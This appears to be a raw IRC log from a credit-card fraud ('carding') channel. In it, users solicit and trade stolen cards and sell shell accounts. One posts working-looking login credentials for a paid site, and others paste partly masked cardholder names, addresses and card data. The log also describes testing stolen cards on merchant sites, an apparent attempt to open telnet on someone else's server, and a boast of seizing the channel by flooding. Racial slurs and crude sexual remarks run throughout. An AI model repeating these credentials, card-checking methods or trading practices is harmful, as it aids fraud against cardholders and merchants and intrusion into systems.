      :Co0lWoRx! :w8
      :Co0lWoRx! :w8
      :Bl4ck__! :looolz
      :Bl4ck__! :www.schoolgirls.com
      :DuXo! :http://cyber.playboy.com/members
      :DuXo! :http://cyber.playboy.com/members
      :DuXo! :hm.
      :DuXo! :that`s good too..
      :DuXo! :i have account on that
      :DuXo! :but i don`t know the fucking pass
      :Bl4ck__! :username : dementul@qubemail.com
      :DuXo! :;)))
      :Bl4ck__! :pass cromo34
      :Bl4ck__! ::>>
      :DuXo! :come on 
      :DuXo! :go shake ur dicks:)))))
      :Co0lWoRx! :lol
      :_Mephisto! ::P
      :DuXo! :put ur dick in the Cd-rom :)) because u can`t put it in pussy :))))))
      :yourlife! :?
      :DuXo! :what ???
      :yourlife! ::)
      :m4r1n4ru! :-join #rocarding
      :m4r1n4ru! :-save
      :TanTouze! :I was sexually assaulted by Bill Clinton
      :DuXo! :anyone here wants to be my drop?
      :Sp07! :sup
      :Sp07! :im done with high school
      :Sp07! :ahahhhhhhhhhhhhhhhhhhhhhhhhhahahaa
      :Sp07! :
      :Sp07! :@#$
      :Sp07! :
      :Sp07! :
      :DuXo! :bye to all
      :_Mephisto! :bya
      :_Mephisto! :bye
      :Tzaranul! :aaa
      :Tzaranul! :re
      :Tzaranul! ::)
      :SPANkY_! :anyone here trade msg me
      :SPANkY_! :anyone here trade msg me
      :Nightw|sH! :re Bl4ck
      :SPANkY_! :anyone here trade msg me
      :trinix! :sup all?
      :trinix! :any one want to send some ccs over my way?
      :trinix! :any one want to send some ccs over my way?
      :SPANkY_! :anyone here trade msg me
      :D1ck! :ins
      :D1ck! :J4n3 
      :SPANkY_! :anyone here trade msg me
      :SPANkY_! :anyone here trade msg me
      :SPANkY_! :anyone here trade msg me
      :dmonchild! :ACTION i am selling hardware if your intrested please /msg me for prices
      :Cyb3rL0rd! :re ppl
      :Sultrix! :Does anyone have any WORKING credit cards the will let me have one to use ?
      :hackmon! :bye
      :Sultrix! :Does anyone have any WORKING credit cards the will let me have one to use ?
      :Fr0d! :any1 op/voice wanna trade
      :m4r1n4ru! :-op
      :Co0lWoRx! :hello
      :Fr0d`! :hey
      :Fr0d`! :sup manm
      :Bl4ck_! :Chel00 heya
      :m4r1n4ru! :ajajajajaj
      :Co0lWoRx! :lol
      :Co0lWoRx! :hey negro, do u ever wonder why Chel00 never talks?
      :Bl4ck_! :coz is an emech
      :Bl4ck_! :Chel00 say hi Co0lWoRx
      :Bl4ck_! ::>
      :Chel00! :hi Co0lWoRx
      :Bl4ck_! ::PP
      :Co0lWoRx! :lol
      :Co0lWoRx! :ok
      :_KAoS_! :anyone in that wants to trade?
      :Fr0d! :msg me
      :Co0lWoRx! :bbl
      :TanTouze! :sell me something.... anything. QUICK
      :Bl4ck_! :ACTION is away -[ bbl ]- at 04:48a -[ P:On / L:On ]-
      :Bl4ck_! :ACTION is back -[ bbl ]- gone 1 min 49 s
      :m4r1n4ru! :-op
      :m4r1n4ru! :-op
      :connex! :i need a cc to buy a shell...anybody can help me?
      :[Mighty]! :trade CC ? 
      :Fr0d! :msg me
      :connex! :yes or visa(master)
      :Tzaranul! :re
      :Tzaranul! ::)
      :connex! :i need a cc to buy a shell...anybody can help me?
      :connex! :i need a cc to buy a shell...anybody can help me?
      :_Mephisto! :where do you buy the shell???
      :Bl4ck_! :www.turbulent.net
      :Bl4ck_! :www.turboshell.com
      :Bl4ck_! :www.shellyeah.org
      :Bl4ck_! :www.bestshell.com
      :_Mephisto! :thx
      :Bl4ck_! ::>
      :[sm0ke]! :is turbulent.net cardable?
      :m4r1n4ru! :nope
      :m4r1n4ru! :ajajajaaja
      :[sm0ke]! :hehe. i knew it. .
      :[sm0ke]! :u have to mail da freakin receipt. .. to have it activated. .
      :connex! :i need a cc to buy a shell...anybody can help me?
      :connex! :pls help me
      :_Mephisto! :bye
      :connex! :i need a cc to buy a shell...anybody can help me?
      :connex! :pls help me
      :[sm0ke]! :buy a shell? where?
      :connex! :[sm0ke] help me
      :connex! :[sm0ke] help me i want to buy a shell
      :TheRason! :hello anybody
      :TheRason! :i need a cc to buy a web domain 
      :[sm0ke]! :
      :card-it! :trading lists, /msg me....
      :card-it! :trading lists and merchants, /msg me....
      :card-it! :no traders in here?
      :Bl4ck_! :ACTION is away -[ Starcraft si astea si alea ]- at 06:26a -[ P:On / L:On ]-
      :card-it! :trading lists and merchants, /msg me....
      :card-it! :trading lists and merchants, /msg me....
      :card-it! :trading lists and merchants, /msg me....
      :card-it! :trading lists and merchants, /msg me....
      :card-it! :trading lists and merchants, /msg me....
      :|Makaveli! :how can we get the +v???
      :|Makaveli! :or an op
      :gatorade^! :ACTION is trading ccz msg me
      :J4n3! :D1ck  ?
      :D1ck! :yep
      :D1ck! :y0
      :D1ck! :i am from my dad's laptiop
      :D1ck! :sun
      :D1ck! :i need a webpage
      :D1ck! :for the box
      :J4n3! :webpage ?
      :D1ck! :deal finialised
      :D1ck! :and u know how can i accept credit card online?
      :J4n3! :yeah u can but fruad bauth hoga, but
      :D1ck! :?
      :J4n3! :if u set the rule that fax or email the scanned copy of credit card phir sahi hai
      :D1ck! :we have to pay for fraud or its their responsibility/
      :D1ck! :oh
      :D1ck! :kool
      :J4n3! :yeah :)
      :D1ck! ::)
      :D1ck! :can u start the page
      :D1ck! :?
      :J4n3! :server ka kyia huwa ?
      :J4n3! :webpage ban jayega forun, j0e kay site ka matter hai meray pass, just need the prices
      :J4n3! :what's the compnay name ? i mean site name ?
      :J4n3! :?
      :D1ck! :got d/c
      :J4n3! :wb
      :J4n3! :webpage ban jayega forun, j0e kay site ka matter hai meray pass, just need the prices
      :D1ck! :thx
      :J4n3! :what's the compnay name ? i mean site name ?
      :D1ck! :company's name is  'Big Stuff'
      :D1ck! :or u have any beter name?
      :D1ck! :i want a site some thing like www.unixrules.net
      :D1ck! :i`ll tell u the prices
      :J4n3! :hmm
      :J4n3! :unixrules is booked i think
      :D1ck! :no no
      :D1ck! :i am ssaying
      :D1ck! :look at their page
      :D1ck! :it rox
      :J4n3! :oh u mean designing ?
      :D1ck! :yeps
      :D1ck! :hehe
      :D1ck! :'Big Stuff' 
      :D1ck! :The Ultimate Web Solution.
      :J4n3! :hmm
      :D1ck! :till when will be the website complete?
      :J4n3! :wait lemme take a look
      :D1ck! :oki
      :J4n3! :hmm yeah saw it
      :D1ck! :kewl
      :D1ck! :what prices should we do?
      :J4n3! :no idea i think it should start from 9 to 10 $ for shell
      :J4n3! :3 to 4 for bnc
      :D1ck! :oki
      :J4n3! :webhosting i'll ask j0e
      :D1ck! :okies
      :J4n3! :oye what bout server ??
      :D1ck! :  4 background processes (eggdrop, screen, irc) 
      :J4n3! :got this box its fast 24.66.83.137.mb.wave.home.com
      :D1ck! :  2 login names 
      :D1ck! :  20 MB total disk space 
      :D1ck! :  FTP, and SSH access 
      :D1ck! :  2 POP3 Email addresses (username@celebreum.net) 
      :D1ck! :  Access to hundreds of VHOSTS 
      :D1ck! :  3 months [$30] - 6 months [$60] - 12 months [$120]
      :D1ck! :  Credit Card Customers, Sign up here
      :D1ck! :  Sign up Now
      :J4n3! :but no linux root kit :(
      :D1ck! :server?
      :D1ck! :heheh
      :J4n3! :i mean have u finalized? 
      :D1ck! :my computer is not working
      :D1ck! :thats why i am in this
      :D1ck! :yep
      :J4n3! :oh
      :D1ck! :finisalised
      :J4n3! :going to pay for it ?
      :D1ck! :yep
      :J4n3! :anuallay ?? how much ?
      :D1ck! :welp
      :D1ck! :200/month
      :D1ck! :and rent is 25 
      :D1ck! :225
      :J4n3! :oh kewl
      :J4n3! :ip's ?
      :J4n3! :how much ip's ?
      :D1ck! :256
      :D1ck! ::")
      :J4n3! :great :)
      :D1ck! :hehe
      :D1ck! :wait i`ll send u .txt for shells
      :D1ck! :one sec
      :J4n3! :k
      :J4n3! ::)
      :D1ck! ::)
      :J4n3! :Caldera OpenLinux(TM)
      :J4n3! :Version 2.2
      :J4n3! :Copyright 1996-1999 Caldera Systems, Inc.
      :D1ck! :oye accept this
      :J4n3! :send send
      :J4n3! :bin/login: error in loading shared libraries: libcrypt.so.1: cannot open shared object file: No such file or directory
      :D1ck! :make it attractive and stuff
      :J4n3! : DCC Unable to create connection: Connection refused
      :D1ck! :err
      :D1ck! :copy paste this
      :D1ck! :SPECIAL PACKAGE
      :D1ck! :  
      :D1ck! :  4 background processes (eggdrop, screen, irc, energymechs) 
      :D1ck! :  25 MB total disk space 
      :D1ck! :  FTP, and SSH access 
      :D1ck! :  2 POP3 Email addresses (username@celebreum.net) 
      :D1ck! :  Access to hundreds of VHOSTS 
      :D1ck! :  
      :D1ck! :  1 month [$20] 3 months [$40] - 6 months [$60] - 12 months [$120]
      :D1ck! :SILVER SHELL ACCOUNT 
      :D1ck! :  2 background processes (eggdrop, screen, irc, energymechs) 
      :D1ck! :  10MB total disk space 
      :D1ck! :  FTP, and SSH access 
      :D1ck! :  POP3 Email addresses (username@celebreum.net) 
      :D1ck! :  Access to hundreds of VHOSTS 
      :D1ck! :  1 month [$10] 3 months [$30] - 6 months [$55] - 12 months [$100] 
      :D1ck! : 
      :D1ck! :GOLD SHELL  
      :D1ck! :  4 background processes (eggdrop, screen, irc, energymechs) 
      :D1ck! :  2 login names 
      :D1ck! :  FREE Personal vhost   (username@can.choose.from.many.domains)
      :D1ck! :  100 MB total disk space 
      :D1ck! :  FTP and SSH access 
      :D1ck! :  2 POP3 Email addresses (username@celebreum.net) 
      :D1ck! :  Access to hundreds of VHOSTS 
      :D1ck! :  3 months [$60] - 6 months [$110] - 12 months [$200] 
      :D1ck! :make the rupeese too pls
      :D1ck! ::P
      :J4n3! :hah u forgot to write the BitchX ?
      :D1ck! :oh yes
      :D1ck! :irc==BitchX
      :J4n3! :eggdrop, screen, irc, energymechs, BitchX
      :D1ck! :yep yep
      :D1ck! :add it
      :D1ck! ::P
      :J4n3! :ok
      :J4n3! :kkz wait lemme copy it
      :D1ck! :oye thats stolen from unixrules
      :D1ck! :so change it a bit
      :D1ck! :jhehe
      :D1ck! :hehe
      :J4n3! :ok done :)
      :J4n3! :yeah don worry prices r same ?
      :J4n3! :or u modified it ?
      :D1ck! :modified
      :D1ck! :and mb space too
      :J4n3! :kkz
      :J4n3! :Celebrium ?
      :D1ck! :yep
      :D1ck! :ok now webpage
      :D1ck! :BASIC WEBHOSTING  
      :D1ck! :  100MB disk space 
      :D1ck! :  1 Mailbox (POP3/SMTP) 
      :D1ck! :  $0.50 per MB on any average storage beyond the standard   allowed disk space 
      :D1ck! :  500 MB of data transfer per month 
      :D1ck! :  3 months [$30] - 6 months [$55] - 12 months [$100] 
      :D1ck! :PRIME WEBHOSTING  
      :D1ck! :  200 MB disk space 
      :D1ck! :  5 Mailboxes (POP3/SMTP) 
      :D1ck! :  FREE Domain Name Registration (internic fee applies) 
      :D1ck! :  Unlimited email address forwarding 
      :D1ck! :  Custom CGI script directory 
      :D1ck! :  $0.50 per MB on any average storage beyond the standard   allowed disk space 
      :D1ck! :  1500 MB of data transfer per month 
      :D1ck! :  3 months [$60] - 6 months [$110] - 12 months [$200]
      :D1ck! :PRO WEBHOSTING  
      :D1ck! :  350 MB disk space 
      :D1ck! :  25 Mailboxes (POP3/SMTP) 
      :D1ck! :  Unlimited email address forwarding 
      :D1ck! :  Custom CGI script directory 
      :D1ck! :  PHP3 access 
      :D1ck! :  Frontpage Extension access 
      :D1ck! :  $0.50 per MB on any average storage beyond the standard   allowed disk space 
      :D1ck! :  5000 MB of data transfer per month 
      :D1ck! :  3 months [$150] - 6 months [$275] - 12 months [$500]
      :D1ck! :modify style and idhar udhar so it doesnt look as we stole it
      :D1ck! :hehe
      :J4n3! :hah is say kuch nahi hotha waisy bee almost sub shells kay milthay julthay hain
      :D1ck! :EMAIL HOSTING  
      :D1ck! :   FREE Domain Name Registration (Internic Fee applies) 
      :D1ck! :   username@your-company.com 
      :D1ck! :   5 Mailboxes (POP3) 
      :D1ck! :   25 Emails Forwarding 
      :D1ck! :  3 months [$30] - 6 months [$50] - 12 months [$75] 
      :D1ck! :lol
      :D1ck! :yup
      :D1ck! ::P
      :D1ck! :oye when will it be complete
      :D1ck! :asnd i am signing up legal domain
      :D1ck! :where should i?
      :D1ck! :cheapest
      :D1ck! :?
      :J4n3! :hmmm
      :D1ck! :mater may we are OC3 :P
      :J4n3! :dotster.com
      :D1ck! :OC3 lines
      :D1ck! :ok
      :J4n3! :yeah from where u getting this server ? and till when u get it ?
      :J4n3! :it should be on redhat ok ?
      :D1ck! :easilyhosted
      :D1ck! :yep
      :D1ck! :it is
      :D1ck! :i`ll make it ultra secure
      :D1ck! :redhat 6.2
      :J4n3! :haha kewl 
      :D1ck! :i`ll upgrade to new kernel
      :J4n3! :give me 2 days for web
      :D1ck! :2.2.16
      :D1ck! :kewl
      :D1ck! :okies
      :J4n3! ::)
      :D1ck! :the day u do it
      :D1ck! :the next day ill get the seerver
      :D1ck! :online
      :J4n3! :hmmm
      :J4n3! :talked to ur dad bout it ?
      :D1ck! :ofcourse
      :D1ck! :he sed 'yes'
      :D1ck! :and i have his cc in my hand
      :D1ck! ::P
      :J4n3! :haha cool
      :J4n3! :woooo
      :J4n3! ::p
      :D1ck! ::/
      :J4n3! :lekin signup kahan say kiya ?? konsee company say ? 
      :J4n3! :t3 ?
      :J4n3! :or oc3 ?
      :D1ck! :well
      :D1ck! :more then Tota1KaaS1
      :D1ck! :t1
      :D1ck! :but
      :D1ck! :technically OC3
      :D1ck! :ll providers who sya they are oc3 are lieing, yes technicqally they
      :D1ck! :are
      :J4n3! :ahaan
      :D1ck! :but its shared bandwith
      :D1ck! :mine will be 990k/sec
      :J4n3! :w00ps
      :D1ck! :to 2 mb
      :D1ck! :and 40 gigs of transfer
      :J4n3! :shells will rock on this server
      :D1ck! :yep
      :D1ck! ::)
      :D1ck! :and i`ve heard routers are firewalled
      :D1ck! :so thats a good enws
      :J4n3! :great already signed up , or going to ?
      :D1ck! :oye pls get started on the page if u are not too bz
      :D1ck! ::P
      :D1ck! :i will send the payment
      :J4n3! :yeah i will from today
      :D1ck! :no cc
      :D1ck! :and today i`ll buy a merchant account
      :J4n3! :oh ohkay :)
      :D1ck! ::)
      :J4n3! :u have too many ips
      :D1ck! :yep
      :J4n3! :we can buy more domains illlegaly to like j0e but
      :D1ck! :that rox
      :D1ck! :well
      :D1ck! :i can get caught
      :J4n3! :first we need the dns of ur server so we can give it when registering the domain
      :D1ck! ::p
      :J4n3! :like ns1 and ns2
      :J4n3! :they need it for registeration
      :D1ck! :oh
      :D1ck! :i am half way through the registration
      :D1ck! :hehe
      :D1ck! :so i cant modify it later?
      :J4n3! :yeah :)
      :D1ck! :kewl
      :D1ck! :almost complete
      :J4n3! ::))))))
      :D1ck! :hehe
      :D1ck! :a graphix of Big Tecnologies would rock
      :J4n3! :sure it would , just see
      :D1ck! ::/
      :D1ck! :oki
      :J4n3! ::9:0:)
      :D1ck! ::)
      :J4n3! :how do i open a telnet on a box ?? from inetd.conf ? when it say connection refused on 23 , its not on hosts.allow
      :D1ck! :err they need name serfver
      :D1ck! :hehe
      :D1ck! :cat /etc/inetd.conf | grep telnet
      :D1ck! :and paste me here
      :J4n3! :yeah wait
      :J4n3! :hahah yeah
      :J4n3! :its close from there
      :J4n3! :the box is kewl i want to run psy from there
      :J4n3! :ip is admin.cgocable.net
      :J4n3! :wait lemme opne it
      :D1ck! :hehhe
      
      Romanian
      
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :D1ck! :Anyone have any "Gold-Line" Canadian Calling card #'s ??
      :m4r1n4ru! :Away
      :[4g3nt]! :anyone can tell how to use a company credit card ????
      :m4r1n4ru! :Away
      :TanTouze! :hi goober... oops wrong window
      :Ricky! :if someone would like to xchange cards contact me
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :Co0lWoRx! :yo m4r1n4ru, stop it pls
      :Co0lWoRx! :yo m4r1n4ru, stop it pls
      :Co0lWoRx! :yo m4r1n4ru, stop it pls
      :Co0lWoRx! :yo m4r1n4ru, stop it pls
      :Co0lWoRx! :damn it, im tired of all this shit
      :Co0lWoRx! :ok?
      :Ricky! :ii have 2 cards i will trade 
      :Ricky! :i dont go first
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :ABA! :Anyone want to trade cards?
      :ABA! :Anyone want to trade cards?
      :m4r1n4ru! :Away
      :ABA! :Anyone want to trade cards? (msg me now)
      :AlfonsoD! :im trading too
      :ABA! :msg me AlfonsoD
      :AlfonsoD! :anyone trading?
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :ABA! :Anyone trading cards?
      :ABA! :4No one trade with D4r1u55
      :ABA! :4Hes a ripper
      :ABA! :4No one trade with D4r1u55
      :ABA! :4Hes a ripper
      :[4g3nt]! :yo
      :[4g3nt]! :is a master card a 16 digit or 13 ?
      :ABA! :16
      :D4r1u55! :?
      :ABA! :xxxx/xxxx/xxxx/xxxx
      :ABA! :4No one trade with D4r1u55
      :ABA! :4Hes a ripper
      :D4r1u55! :wow
      :D4r1u55! :ABA
      :D4r1u55! :look here
      :D4r1u55! :[10:24] <D4r1u55> Not Approved: Customer information invalid. 
      :D4r1u55! :[10:24] <D4r1u55>      Not Approved: Invalid Credit Card Number. 
      :D4r1u55! :u give me 2 cc's.but are not viabils
      :D4r1u55! :[10:11] <ABA> <ABA> Dick xxxxxxx
      :D4r1u55! :[10:11] <ABA> <ABA> xxx St Example St
      :D4r1u55! :[10:11] <ABA> <ABA> Somewhere US
      :ABA! :I gave you two working CCs
      :ABA! :then
      :ABA! :you try to send me
      :ABA! :some bullshit
      :D4r1u55! :10:11] <ABA> <ABA> 10320
      :D4r1u55! :[10:11] <ABA> <ABA> 06/200x
      :D4r1u55! :[10:11] <ABA> <ABA> Mastercard.
      :D4r1u55! :[10:11] <ABA> <ABA> xxxx xxxx xxxx xxxx
      :D4r1u55! :[10:11] <ABA> .
      :ABA! :1.2meg html file
      :D4r1u55! :[10:11] <ABA> John Salvo
      :ABA! :fucking thief
      :ABA! :4No one trade with D4r1u55
      :ABA! :4Hes a ripper
      :D4r1u55! :[10:11] <ABA> 1175 Example Ave
      :D4r1u55! :[10:11] <ABA> 33146
      :D4r1u55! :[10:11] <ABA> VISA
      :D4r1u55! :10:11] <ABA> VISA
      :D4r1u55! :[10:11] <ABA> 12/200x
      :D4r1u55! :[10:11] <ABA> xxxxxxxxxxxxxxxx
      :D4r1u55! :and that's all
      :ABA! :you lame gimp
      :ABA! :youve got them the wrong way round
      :ABA! :thief
      :ABA! :4No one trade with D4r1u55
      :ABA! :4Hes a ripper
      :m4r1n4ru! :Away
      :D4r1u55! :that two cc's u send to me
      :D4r1u55! :and are'nt good
      :D4r1u55! :dont work
      :D4r1u55! :try to understand
      :D4r1u55! :whatever
      :[4g3nt]! :how can i card a company cc?
      :ABA! :4No one trade with D4r1u55
      :ABA! :4Hes a ripper
      :[4g3nt]! :hihi
      :[4g3nt]! :anyone can tell me how to use a company owned cc??
      :m4r1n4ru! :Away
      :Emy__! :I need some Cc `z (Visa)
      :Emy__! :...
      :ABA! :Anyone want to trade cards, msg me.
      :Emy__! :I need some credit cards .... Visa
      :ABA! :Emy MSG me then
      :m4r1n4ru! :Away
      :D4r1u55! :ACTION plek pa
      :J4n3! :nettlink
      :ABA! :ANYONE want to trade cards?
      :Emy__! :I need some credit cards .... Visa
      :ABA! :Message me then you fucking idiot
      :ABA! :how many more times
      :m4r1n4ru! :Away
      :2red! :ACTION is selling virgin credit cards, /msg me for deal.
      :ABA! :4ANYONE want to trade cards? Msg me
      :ABA! :4ANYONE want to trade cards? Msg me
      :[4g3nt]! :fuck ABA <<< ripper 
      :[4g3nt]! :fuck ABA <<< ripper 
      :[4g3nt]! :fuck ABA <<< ripper 
      :Emy__! :I need some credit cards .... Visa
      :m4r1n4ru! :Away
      :ABA! :4ANYONE want to trade cards? Msg me
      :ABA! :4ANYONE want to trade cards? Msg me
      :m4r1n4ru! :Away
      :Emy__! :anybody want to give me a cc ??
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :ABA! :Anyone want to trade cards?
      :sunfire! :
      :ABA! :Anyone want to trade cards?
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :connex! :anyone can help me to buy a shell?
      :m4r1n4ru! :Away
      :m4r1n4ru! :I have Returned.
      :m4r1n4ru! :-op
      :sunfire! : :-)
      :|DONNIE|! :ne1 have BNC...i have virgin..
      :|DONNIE|! :lets trade
      :DuXO! :hi to all
      :Razzorz! :anyone have bnc
      :Razzorz! :anyone have bnc?
      :Razzorz! :please tell me about bnc
      :DuKso! :hi anyone alive?
      :2red! :nope
      :DuKso! :how are u 2red :)
      :DuKso! :where are u from?
      :2red! :<- mortie/lita
      :DuKso! :hi man
      :DuKso! ::)
      :DuKso! :what are u doing:)
      :2red! :nothing
      :2red! :just listening to music
      :Nic[EQ]! :ACTION is trading Visas and MCs, looking for more or for shells
      :Emy__! :I need some cc `s (I do not have any )
      :FooDSt4mP! :anybody have any visa's?  i need to get a plane tick for a chick who's being abused by her husband
      :FooDSt4mP! :ill trade shells and dialup accounts for a visa/cc
      :[St0rM]! :hahahah
      :FooDSt4mP! :dude its not funny
      :FooDSt4mP! :its sad
      :FooDSt4mP! :i know it sounds like good bs for a card but its not..
      :MonTs! :what sort of shells?
      :FooDSt4mP! :aragorn.example.net
      :FooDSt4mP! :its a linux box.. rh 6.1... 6 bg's... 250 meg quota...
      :MonTs! :how many BG process?
      :FooDSt4mP! :redundant t3 conn
      :FooDSt4mP! :6 bg's
      :MonTs! :what's the http address?
      :FooDSt4mP! :no http.. its a private shell off a friends companies box
      :FooDSt4mP! :example.net is the isp
      :FooDSt4mP! :aragorn.example.net is the telnet addy
      :FooDSt4mP! :i just need some cc to get a damn ticket for this girl man
      :FooDSt4mP! :msg me if you wanna trade
      :pFFt--! :ACTION any1 wanna trade virgin cc's? msg me for fair trade (rippers go away)
      :pFFt--! :ACTION any1 wanna trade virgin cc's? msg me for fair trade (rippers go away)
      :2red! :pFFt--
      :Neon! :Have some cc...
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :2red! :we hear you
      :2red! :stop it
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :kurky! :I need someone to do me a favour....
      :kurky! :ull get a few virgin visa's
      :m4r1n4ru! :-join #rocarding
      :m4r1n4ru! :-save
      :glipy! :bah
      @ hi!
      
      :glipy! :care-mi zice shi mie un site de un sa cumpar tembelfoane
      @ tell me a site where to buy "idiot-phones" (probably mobile phones)
      
      :glipy! :hap
      :glipy! :?
      :^W! :ACTION is trading ccz msg me for trade
      :wizz! :hey tabacu
      :TanTouze! :ok I'm here, now what were you saying?
      :NiCeBoY! :ello
      :NiCeBoY! :wers coolworx?
      :Mendoza! :hey . Ibill is  cardable?
      :DuXo! :hi to all
      :DuXo! :how are we today
      :NiCeBoY! :ello duxo
      :ABA! :Anyone want to trade cards? MSG me
      :DuXo! :npn msg me 
      :ABA! :Anyone want to trade cards? MSG me
      :NiCeBoY! :
      :DuXo! :any trade cc
      :ABA! :Anyone want to trade?
      :DuXo! :me :)
      :ABA! :heh
      :ABA! :again?
      :DuXo! ::))
      :DuXo! :yes but do u have with the phone number too?
      :lkd1! :i have
      :ABA! :no, just make one up innit :P
      :DuXo! :lkd1 :)
      :DuXo! :ripper:)
      :DuXo! :he just leave the channel :))
      :ABA! :ripper?
      :DuXo! ::)
      :ABA! :I just traded wif him :P
      :DuXo! :aND?
      :DuXo! ::)
      :DuXo! :he gaved u valid?
      :DuXo! :i haven`t trade..
      :ABA! :I verified
      :DuXo! :but he don`t wanted to trade with me .....
      :ABA! :before I gave him #
      :DuXo! :becasue he thinked...
      :DuXo! :im ripper 
      :2red! :duxo :P
      :DuXo! :with +v
      :ABA! :heh
      :ABA! :ive been ripped so many bloody times
      :ABA! :if they dont give me first
      :ABA! :I dont trade ever
      :DuXo! :ok....
      :ABA! :cos ive been ripped so many times
      :ABA! :about 10 times wif cards
      :ABA! :3 shells
      :ABA! :etc
      :2red! :tss
      :2red! :is that supposed to be something?
      :2red! :i got ripped off 40 virgins in one deal once
      :ABA! :40 virgins what?
      :2red! :40 virgin cards
      :ABA! :Drake``: Trade?
      :ABA! :ic
      :ABA! :and when some little foreign pissant lamer
      :ABA! :steals from you
      :Drake``! :trade what?
      :ABA! :then runs off
      :ABA! :Drake``: Cards
      :ABA! :it makes you wanna bloody cry
      :ABA! :and beat your comp
      :ABA! :innit
      :2red! :where are you from npn, romania?
      :ABA! :no uk
      :2red! :ok
      :2red! :sweden here
      :ABA! :england
      :2red! :interested in UK virgins?
      :ABA! :leet
      :ABA! :hmmm
      :ABA! :yup
      :2red! :i got plenty of international virgins
      :2red! :and US ofcourse
      :ABA! :quick tho
      :ABA! :cos i gtg real soon
      :2red! :err?
      :2red! :quick though what
      :ABA! :trade quick
      :ABA! :get on wif it
      :ABA! :cos i gtg
      :2red! :why would i trade virgins?
      :ABA! :no
      :ABA! :like i gib you summat else
      :2red! :hehe
      :2red! :i sell cards dear.
      :ABA! :oh dear
      :ABA! :so
      :ABA! :what do you want for it
      :2red! :money
      :ABA! :how much?
      :2red! :depends on how many you want
      :ABA! :10
      :2red! :100 dollars
      :ABA! :fuck me
      :2red! :?
      :ABA! :(please)
      :ABA! :i aint got 100$s
      :2red! :thats what it costs
      :2red! :thats how it is :)
      :hhkrgb! :romania anyone?
      :Bl4ck_! :yes
      :ABA! :0mg
      :ABA! :I dont fucking believe this
      :ABA! :that fool
      :ABA! :DuXo just ripped my card
      :ABA! :and ran
      :2red! :you surprised or something?
      :ABA! :erm
      :ABA! :yes
      :ABA! :hes an op
      :2red! :so?
      :ABA! :and ops dont do that kind of shit
      :ABA! :ive been trading here
      :ABA! :for about 
      :ABA! :6 months
      :ABA! :and no ops ever done that shit
      :2red! :thats interesting
      :2red! :cause i havent seen you areound much before
      :ABA! :Ive never seen you either
      :m4r1n4ru! :ABA can you send me a log man ?
      :2red! :my usual nick is mortie or lita
      :ABA! :m4r1n4ru yea, when I get back
      :ABA! :2red: ive seen the nick lita
      :ABA! :ages ago
      :m4r1n4ru! :ok send me log please
      :ABA! :I need dinner
      :t4b4cu! :huh
      :2red! :duxo
      :Piano2! :what?
      :t4b4cu! :so taht's lita
      :DuXo! :it`s me..
      :Bl4ck_! :t4b4cu?
      :2red! :im lita yeah
      :t4b4cu! :always changing nicks
      :t4b4cu! :hhe
      :DuXo! :i know..
      :Bl4ck_! ::>>
      :2red! :doesnt matter since i dont trade
      :2red! :i just watch you ppl
      :DuXo! :hm
      :2red! :and obviously an op just ripped?
      :DuXo! :npn
      :DuXo! :man
      :DuXo! :m4r1n4ru
      :DuXo! :i haven`t rip him up
      :2red! :what happened then?
      :DuXo! :man
      :DuXo! :he gaved me CCs
      :m4r1n4ru! :ya
      :m4r1n4ru! :what ?
      :DuXo! :2
      :DuXo! :and the both where invalid
      :DuXo! :we tradeed 340 minutes before
      :t4b4cu! :?
      :DuXo! :we tradeed 30 minutes before
      :DuXo! :he gaved me valid
      :t4b4cu! :who ripped?
      :DuXo! :and i gaved him valid CC
      :DuXo! :man
      :DuXo! :becuase i haved +v
      :t4b4cu! :who ripped?
      :t4b4cu! :i ban anyone who ripps
      :t4b4cu! :so ....i'd like to know
      :DuXo! :i checked the 2 ccs on www.come.to/tdnga
      :DuXo! :the first 2 sex banners..
      :DuXo! :i used the first one
      :DuXo! :and the CC comed out decliened
      :DuXo! :after that 
      :DuXo! :i checked the CC on www.bonzi.com
      :DuXo! :on Internet Boost
      :DuXo! :the first one come out and send me Invalid Card...
      :DuXo! :and another that the card is not valid anymore...
      :DuXo! :tabacu are u here??
      :2red! :oh well
      :2red! :you kids
      :2red! :i never understood the point of trading cards anyway
      :t4b4cu! :ahhahaah
      :t4b4cu! :looolz
      :t4b4cu! :us kids?
      :DuXo! :LoL
      :t4b4cu! :how old are u my dear?
      :2red! :im 20
      :2red! :why
      :DuXo! :so
      :t4b4cu! :lolz
      :DuXo! :what will happen?
      :t4b4cu! :i'm 20 too
      :DuXo! :u know that im a Legit one 
      :DuXo! :i can prove that man..
      :DuXo! :i have never ripped a man
      :t4b4cu! :most ppl areound here are about that age
      :2red! :i dont see anyone in here as legit
      :t4b4cu! :ahhah
      :t4b4cu! :what about me?
      :2red! :why would i see you as legit?
      :t4b4cu! :i have more ccs than anyone here
      :t4b4cu! :heh
      :2red! :and how many is that?
      :t4b4cu! :and i never ripped in my life
      :t4b4cu! :about 40.000
      :2red! :is it just me or could anyone say that?
      :t4b4cu! :anyway....i more hacker than carder
      :2red! :same here
      :t4b4cu! :that's why i could take this chan over
      :t4b4cu! :eheh
      :t4b4cu! :with my friends
      :hhkrgb! :join/romania
      :2red! :taking over a channel doesnt really require any skills.
      :hhkrgb! :wops
      :t4b4cu! :we flooded from oc48
      :t4b4cu! :heh
      :t4b4cu! :lolz
      :t4b4cu! :it does
      :2red! :packeting is for kids
      :t4b4cu! ::)
      :DuXo! :tabacu
      :DuXo! :is everthing ok now?
      :t4b4cu! :yeh it is
      :DuXo! :ok..
      :m4r1n4ru! :hhm
